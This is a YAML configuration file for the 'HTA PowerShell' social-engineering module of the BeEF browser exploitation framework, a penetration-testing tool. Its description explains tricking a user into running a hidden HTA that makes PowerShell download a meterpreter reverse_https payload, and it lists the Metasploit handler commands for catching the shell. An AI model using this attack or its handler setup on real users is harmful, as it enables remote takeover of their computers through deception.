#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
hta_powershell:
enable: true
category: ["Social Engineering"]
name: "HTA PowerShell"
description: "Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame.
If the user allows execution, powershell is used to download the payload (by @mattifestation) from BeEF.
The default payload is windows/meterpreter/reverse_https, and the attack works on both x86 and x86_64 targets.
Before launching the module, do the following on Metasploit:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
set ExitOnSession false
set AutoRunScript post/windows/manage/smart_migrate
exploit -j -z"
authors: ["antisnatchor"]
target:
user_notify: ["IE"]
not_working: ["ALL"]